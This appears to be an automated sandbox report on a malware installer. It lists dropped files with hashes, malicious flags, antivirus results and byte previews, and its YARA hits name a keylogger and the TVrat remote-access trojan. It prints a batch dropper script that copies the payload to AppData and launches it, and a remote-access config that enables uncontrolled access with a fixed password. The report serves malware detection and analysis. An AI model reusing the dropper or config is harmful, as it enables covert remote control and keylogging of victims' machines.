                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388688
                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......lU.*(4.y(4.y(4.y!L<y.4.y!L-y34.y(4.y.4.y...y#4.y(4.y=4.y!L;y.6.y!L*y)4.y!L,y)4.y!L)y)4.yRich(4.y................PE..L...#..]...........!.................................................................:...............................A.......6..x.......0...........................p...................................@...............(............................text............................... ..`.rdata..XY.......Z..................@..@.data............t..................@....rsrc...0............Z..............@..@.reloc..,............`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):713456
                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..k...k...k....%B.b....%@....%A.r...P..z...P..}...P..d...Fx.h...k...=...k...J......Y......j.....L.j...k.$.j......j...Richk...........PE..L...Q.xX...........!.........$.......P....................................... ............@.........................0....... ...(.......@........................8..0p..p............................p..@...............\............................text...9........................... ..`.rdata..............................@..@.data...(...........................@....gfids..d...........................@..@.rsrc...@...........................@..@.reloc...8.......:..................@..B................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):541880
                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L.....7a...........!.........................................................p............@..........................)...N........... ..s............ ...$...0...5......8...........................H...@............................................text............................... ..`.rdata...g.......h..................@..@.data....;.......6...`..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..`=...0...>..................@..B................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):970912
                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370488
                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-...~...~...~.......~....l..~.......~.......~.......~.......~.......~...~...~]...k..~]......~]..~...~]......~Rich...~........PE..L....g._.........."!.................U....... ...................................... .....@..........................^......\h..(.......................8.......l....W...............................W..@............ ...............................text............................... ..`.rdata..6N... ...P..................@..@.data...8....p.......^..............@....rsrc................h..............@..@.reloc..l............j..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1074302464
                                                                                                                          Entropy (8bit):0.007609102467218604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1E2570A7DD0C8452B18340E4386C1FA3
                                                                                                                          SHA1:FE1D6D0D86171E8F9AE64A909C4ADCCA13267B20
                                                                                                                          SHA-256:DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699
                                                                                                                          SHA-512:02951D9CD5E88D91A10524D811D5673A2A98DB5EB21E97A1273900625A932DD933B82B60B09C5FE28381890471A7B40388CA3ACD84D5FE42BF9A4B4693727F72
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L...d.&d...........!...I.p...............................................................@.....................................................................V....................................................................................code....o.......p.................. ..`.data...8............t..............@....rdata..............................@..@.edata..............................@..@.reloc..V...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):43
                                                                                                                          Entropy (8bit):5.147194987260237
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Sq5uPjUyADkIBtn:Sq58jXRcn
                                                                                                                          MD5:8F4CE44A5E8091CB181665143152AFCB
                                                                                                                          SHA1:17A094A6F2D68749DFE92C59626291DC45F2F672
                                                                                                                          SHA-256:CFDEB9B5BCA81247A01C294F66CAD0E78BC3DE957FDBFF9C907C00AF1718E9A5
                                                                                                                          SHA-512:70689E1EF53CCBFFF4E83C6A92A543E5CF122DFD95DD57F61E918C0469C36B2653CE08004447C7A9A7663F0AECFCFB6300AFBE134300F1CFF619420D324C5B11
                                                                                                                          Malicious:false
                                                                                                                          Preview:..8..DXP;...&..P_.e....SAFH.J.......J....lF
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):172216
                                                                                                                          Entropy (8bit):6.698242571688099
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:nGhQI/PxvCWRDvcDfo0F5HekeyO54ECV0/sMHL0WPCCb5rAg0Fujx8E0/3xt9qKv:kPxqWYF5HkyDLMsOzrAOL23VqK28j
                                                                                                                          MD5:CF1169A87FE6266C7B457A2424DA69DA
                                                                                                                          SHA1:5ADD67DEFD4CA56C1E9C0B239899EA699B140B64
                                                                                                                          SHA-256:24E01FD95225E260CDD41015A70374A048568D4DF6681B3D44EAABCB1EA03EAF
                                                                                                                          SHA-512:7BF76EB5B4E31A65931AF730909FBF848334BC98DA279E291E186FCAFDC81C76D1EF0EFEC4E00B8EAEDE6F8D130DA8B6B3D3C5DD8C14C6DCD3BCDC7D050A4B66
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.%.).K.).K.).K.r.H.$.K.r.N...K.r.O.?.K...J.-.K.{.H.=.K.{.N...K.{.O...K.r.J...K.).J...K...B.!.K...K.(.K.....(.K.)..(.K...I.(.K.Rich).K.................PE..L.....@a...........!.....t...........V..............................................B.....@.........................`X..h....X..P.......(............|...$...........H..8............................H..@...............8............................text....s.......t.................. ..`.rdata...............x..............@..@.data........p.......P..............@....rsrc...(............\..............@..@.reloc...............b..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7543992
                                                                                                                          Entropy (8bit):6.717610928993395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:q0f/bCIDcCkgVmZqIXrdoXj++CEKDFBaVOGizeKFUtqiAp+hRWmMLlJ7p1:X/bCIPkgVpycKDFqOLNUtqiAz
                                                                                                                          MD5:8002D9E5851728EB024B398CF19DE390
                                                                                                                          SHA1:9A1DC7134F3F6FCCB37DFC4DDDA35DFA2875095E
                                                                                                                          SHA-256:B8DDE42C70D8C4A3511D5EDFFBC9F7F0C03DBDA980E29693E71344F76DA6BB0F
                                                                                                                          SHA-512:6936B6B01F9FC2F2F69DE6AE468A9F7173239BD003AD8B7BC7336C4DD4DB50457E20EC6783B2E8A166D684A56F3F1E9FB701CA903DF3F74E3CA25C46B8A8D00E
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....@a..................K..`'.......K.......K...@...........................y.......s..........@............................S..m....X..f ...........r..$... T.8d............T...............T.....................@.S..............................text... .J.......J................. ..`.itext..$.....J.......J............. ..`.data...T"....K..$....K.............@....bss..........M.......M..................idata...m....S..n....M.............@....tls....D.....T......*N..................rdata..#.....T......*N.............@..@.reloc..8d... T..f...,N.............@..B.rsrc....f ...X..f ...R.............@..@..............y.......r.............@..@................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):581304
                                                                                                                          Entropy (8bit):6.580382227041057
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:bj4Q3+oAscridrDg76u3HsBTc9GtIGPi2Emvh5/kJSMl0yomcY/nRwl2Sp:bHYXSTMGtNPitm1yomJ/n+tp
                                                                                                                          MD5:CDC5A8221738C1CA66564755BB58138C
                                                                                                                          SHA1:EF096A2CAF133D217C202C147855F2CEE7ECD105
                                                                                                                          SHA-256:DF5CEF85E92C6FFFAAC0ACDCE645AED3C5FA1F8FE7F9700D84CA08468AD3D5E3
                                                                                                                          SHA-512:A9F3E256518771C1C97374E7AE3EE19EBEC0D794CD740E059DBC8289356CF1FB5D4A19F2677DB2ADBB179A73520AAEC67947DCF4C8BCD930206DE4B6CDCAD4C6
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9...}..O}..O}..O.|*Ol..O.|(O...O.|)Oc..O/..Nd..O/..N...O/..N_..O...Ol..O}..O...O..Nh..O..N|..O.$O|..O}.LO|..O..N|..ORich}..O........PE..L...L..a...........!..... ...........m.......0......................................C.....@.........................0...P...............0................$.......[......p..............................@............0...............................text............ .................. ..`.rdata..H....0.......$..............@..@.data....d... ...D..................@....rsrc...0............X..............@..@.reloc...[.......\...^..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1724088
                                                                                                                          Entropy (8bit):6.573221633911959
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSvSSSSSSSSSSSSSSSlwwwwwwwwwwwwwwI:uSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSO
                                                                                                                          MD5:E0E559010A1CC7CB6B6F754E8833A156
                                                                                                                          SHA1:0ADB286A1511B9D5820B042EE7D059DAEE8D0978
                                                                                                                          SHA-256:A49D90D39BCF0FB183A8E2DFDA90E1B745565DDC25C0CC92ED7068868CB8F3E4
                                                                                                                          SHA-512:3225A22CA8044FAFE03C005C55924B71EC2D3C9EE2325B45703EADC1F912DD867DD7FADCA0652FA2ACD46D4067575377388134E3CC58B13C0F82540224E98221
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....5k.o....5i.....5h.h.......Y...w...:...........%...l...%.......%...R....VQ.d...w................v.....e.v...w...v.......v...Richw...........PE..L..._..`...........!.....@...B...............P......................................Q.....@.........................@Z..H....Z..........(............*...$... ..........p...........................P...@............P..|............................text....>.......@.................. ..`.rdata..(....P... ...D..............@..@.data........p...2...d..............@....rodata.@...........................@..@.rsrc...(...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17648
                                                                                                                          Entropy (8bit):6.317642988990049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ZPkFNiOMTd1th9gQIim+4vBDVU376TFNiWC:iNhMpXgIr4vBBYANi1
                                                                                                                          MD5:ACF7048E2347CFD66CD17648DBFBAF45
                                                                                                                          SHA1:DF5A12E399176771DC8CF2F7D0CF5548E41E2BB3
                                                                                                                          SHA-256:F1CFFBC2ADA8491755C76360AAD14314DEB576AA65F503E52FA24DEE7D33D8E7
                                                                                                                          SHA-512:51A53CB700FBB7ABF3BDA3101ED0885572460C1686D07C3D2125C8AA6F0834E30528BEE78CC40EE9270714A16AC769D16F5A916F37F0E48BBF7121202E58E0C0
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......):5.m[[.m[[.m[[.d#..o[[.d#..c[[.d#..o[[.d#..j[[.m[Z.S[[.d#..k[[.d#..l[[.d#..l[[.Richm[[.........PE..L......K...........!.........................0...............................p............@..........................<..N...|6..P....P...............0.......`..$....................................4..@............0...............................text...;........................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc........P.......(..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):586
                                                                                                                          Entropy (8bit):5.193353768565217
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:LzSeQNlTQ/dw/7y/x5/D++472p+fso+9hffAaJYQMhsK/qI8qP:HSeWlcMypJD5KxkiaJosBq
                                                                                                                          MD5:CAA0C19D802D86B5A6B290897AA864EE
                                                                                                                          SHA1:01C139425983B9EC2A8FE42C9D685D1193D5A8BB
                                                                                                                          SHA-256:EDEECC1090C314D7397B171CD09E1C208FCCE3B580794BAC425475E4292629FA
                                                                                                                          SHA-512:95B595038F720A45449E77E121B0AF3FFA251034EFD6F187C8572C54F667D11F467AF6A5F062F50B60C8001645CA33B5F204482753AF72BDD2AA3A3834BD2C35
                                                                                                                          Malicious:false
                                                                                                                          Preview:[config]..Security.FixPass=96E79218965EB72C92A549DD5A330112..Main.Autorun=1..Main.CloseButtonOperation=0..Main.CheckUpdates=0..Security.UseLocalSecuritySettings=1..Security.DynPassKind=0..Security.PassLifetime=0..Security.CanWinAuth=1..Security.AccessKind=1..Security.CanWinLoginAnotherUser=1..Security.UNCONTROLLED_ACCESS=1..Security.CanWinLoginNotAdmin=1..Security.DenyRemoteSettingsControl=0..Security.DenyLockControls=0..Log.ServerStoreTechLog=0..Main.AWAYMODE_REQUIRED=1..Main.LogsLifetime=1..Main.LogsForMail2Support=1..ProxySettings.UseKind=1..ProxySettings.StoreUserAndPassw=1..
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):10752
                                                                                                                          Entropy (8bit):7.9500738973365355
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Nr2Ya94sQ6EqghLbOU+fWt1t7ZPA+KAMcB6Bk0Nmd32iF2la8XncszJfBzG1:p2Ya94s8q8+fQttI+8cABGJ4la8vVfp6
                                                                                                                          MD5:15955D8B74435C9CA1A6E273644CE86B
                                                                                                                          SHA1:E43F73B27A7F76014706296339F4CE1C71C86EFE
                                                                                                                          SHA-256:796097E407FE8EB02A965CD5416DDAE0C1F178C153A71FCF8590F4BED4F5A389
                                                                                                                          SHA-512:38593F7523D416A4E0BC855F52BA76B1ABE1F65E912ED5E892DE4C210B0055B07472DA5B8C0CB731BC1E4B26C43FF2A346CE84B893907AB121EB74D6555296C8
                                                                                                                          Malicious:false
                                                                                                                          Preview:......JFIF.................................................. ,$..) ..&6&).2333."9>;1=,230...........2)$)52222222222822222222222222222222222222222222222222...........".......................................F......................!.1..AQ."aq.2.Bb...#R....3r....C....$s.45DSt.................................(........................!1A"Q.a2q.................?..N....+..@S.W...@....+..../..8..5.=..}.kAD....>q....E..n.r./.Q..v......5..v.l....f?.s.....m.R.Z.......D..u...-....K..U...S.Xt ......^'... ...[gv....Xjm.*p$.~..n.LY.%.,@..x....|(...Z.X.Uk.1..=...u....U.1.L...@..-r......e...G.Vo.......Vb..P.y.A.....&v5..p..U#Sy.........X..+&-........../.k.A..0$..Jt..t.&.V.\u.q.+....."J..GH..o[.......Tjq"G..o..e.:H.h...:..Ah..=.H..J...V....Y...2.........{.;U.......`...Y..@..'`3....(.s.k..c...eY...03.'.T.V..e@..h \(..vI]...F....Fu.....'...g-.....-..;6L.i.N...W.-.f...WQ..@..ub;.=.[.r..|k......bL...i.o&..9..m..`....3...a...R.7%.=z..N.s.n.R..b;k......h.5M...h..Ay..........q
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):4.596567576097278
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:hmR9ooW9rw49edspB7utcA2dcvNiccA2dx0HcA2d7DvDTfcA2djLvWVOzwaowQ4:w7Q249edaBS7jfxmfJ8WsQwH
                                                                                                                          MD5:21138C5F0FC42E27B57CBADC4CFCB7B7
                                                                                                                          SHA1:EBC7FB05FD67B43925EC4EE2A43A2F3152712B28
                                                                                                                          SHA-256:C8D896D8DAE872D0FF7ED407E9706E19F798FBADBA7AF7EF48E5EDDA4BF05C23
                                                                                                                          SHA-512:20D832E675D2AAB97DF7FC10BAD055F96327F782224C0A1C0F10C4D7CF01CCC7428AB934DA889935C2E67D6FAC959C1F52D796314988168844C5F079B55D67F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:@echo off..set "StartDirName=fat" ..set "TempDirName=qilq" ..set "BatchName=g3ll5lm.bat" ..set "ProcName=ast.exe" ......mkdir "%appdata%\%StartDirName%"..xcopy /Y /I /S "%~dp0*" "%appdata%\%StartDirName%\"..del /f /q "%appdata%\%StartDirName%\%BatchName%"..start "" "%appdata%\%StartDirName%\%ProcName%"..for /d %%i in (%temp%\%TempDirName%) do rd /s /q %%i..
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2236144
                                                                                                                          Entropy (8bit):5.624149670958732
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:2HGHuX4EewGQcPryfFMoxJ+4PulW/ChEIgTS/zRUm:2HGOX4CGQtMs+WuVge/em
                                                                                                                          MD5:BCCF6A5C2595EEA84533692BB788D8BB
                                                                                                                          SHA1:24318226F145E52B7633A4E9E844D6EAD43B75AC
                                                                                                                          SHA-256:ABF75DE674428E112F90F1C618218FF73EF851F4F09C5F5BA8B69E79A6C74DBF
                                                                                                                          SHA-512:78F24F0812AAE31E83340ADEB1A1AE8C00EDFDF483E299706F863CB713BFDC2501B5418CE8F8BD9131E3C704BFFB58A8CA05C5E0A75EB19F15E0409C5B74E35B
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............}...}...}.K....}.K..._.}.K.....}...~..}...y..}.......}...|.W.}...x...}...x...}...}...}......}.......}.......}.Rich..}.................PE..L..."..[...........!.........x.......................................................,"...@.........................P.,.^....s-.P.....-.0.............".......-.....`.+.8...................@.+.......+.@............p-..............................textbss.T...............................text.......p...................... ..`.rdata....... '.....................@..@.data....`....-..@.... .............@....idata.......p-....... .............@..@.msvcjmc......-....... .............@....tls..........-....... .............@....00cfg........-....... .............@..@.rsrc...0.....-....... .............@..@.reloc........-....... .............@..B................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2533560
                                                                                                                          Entropy (8bit):6.236092740507617
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:y+PXMbxU8+hh5Mitv70n8yT1CPwDv3uFfJEkyD9:y+PwEMit0n8A1CPwDv3uFfJC
                                                                                                                          MD5:59A3B581020759D52538425A1F5A53D5
                                                                                                                          SHA1:4E7C528EFEF2C42119C80EFE0AA994B7AA6D2AB6
                                                                                                                          SHA-256:4C94F00150231420A0526E9949AC9F339EB04B16BC18CB8A11C7FD98DB1235D6
                                                                                                                          SHA-512:9D30D8167E787FD4A82444BAAA3703920EC41CBE9C684010B63564DE04E00D590C8081006C68627B8297D2715194D4B80C23B959E554D42B2770664D1ED1B79E
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[J...+...+...+...S#..+..MC...+..MC...+..MC...+..MC...+..DC...+...+...+...+...+...B..j)...B...+...BO..+...B...+..Rich.+..........PE..L.....7a...........!.....T...p......;H.......p................................'.......&...@...........................#..h....%.T.....&.|.............&..$....&.L...0.".8...........................h.".@.............%..............................text...>S.......T.................. ..`.rdata.......p.......X..............@..@.data....Y...p%......X%.............@....idata..J.....%......n%.............@..@.00cfg........%.......%.............@..@.rsrc...|.....&.......%.............@..@.reloc........&.......%.............@..B........................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2098416
                                                                                                                          Entropy (8bit):6.277915381502377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:Vkv4EyvQ/qpyr0kAYdQqqW6qvHewDe01CPwDv3uFR0b5YrpsJ:VkvXyvQ/qpyr0kAd66oewv1CPwDv3uFI
                                                                                                                          MD5:1AFC9BD5E625E85B696141F62FBA4325
                                                                                                                          SHA1:56FB325125F436D7408808446D58AF50F8AA3BFC
                                                                                                                          SHA-256:83A1E3CBE242B978B9F55273B7B2648D0492B741FF561C0EC1C6AD9A4AEDAB47
                                                                                                                          SHA-512:02C2CF9DBC319C2AAF324175CFD3E435824439F33B4CA697324F1B8FF4331D7BDE80DE46909FC629193EF02DEB40853E295B35DC2E3B094D116B5DD783919213
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........+...x...x...x...x...x..,x...x...x...x...x...x(.8x...x...xT..x...x...x@s.x...x@s/x...x..(x...x@s-x...xRich...x................PE..L....<.Y...........!.....j...................................................` ....... ...@.............................1...c..x.................................. ...8............................w..@............`...............................text....i.......j.................. ..`.rdata..XA.......B...n..............@..@.data............Z..................@....idata..M....`......................@..@.rsrc...............................@..@.reloc..z............&..............@..B................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):546816
                                                                                                                          Entropy (8bit):6.657309146326691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:DEnhioDz6zv6pmEmE5A8K8ZOO2rKQrbdCPAEI:Dmbz+vomEBHbZO2YCBI
                                                                                                                          MD5:13CD45DF8AAA584EBD2A40EDE76F1E06
                                                                                                                          SHA1:BAA19E6A965621CB315E5F866EDC179EF1D6B863
                                                                                                                          SHA-256:3FF4E80E327F298A11E116A517BE0963A0B3CD376A6A624CAFFACD586E6B1449
                                                                                                                          SHA-512:285D7265AC05CECDD43650E5DEF9198B5F2F4D63665739BAA059598E41F4CE892248D3CA7E793AC274DC05B4C19CFA11C17FAEA62FC1E3495C94A03851049328
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z%...K..K..K..sH..K..sN...K..sO..K.4....K..sN..K..sO..K..sH..K..sJ..K..J.k.K..rO.>.K..rK..K..r...K.....K..rI..K.Rich..K.................PE..L......_...........!......................................................................@.............................0...0...x....@.......................P...H......................................@............................................text...D........................... ..`.rdata..ZQ.......R..................@..@.data...x+..........................@....rsrc........@......................@..@.reloc...H...P...J..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
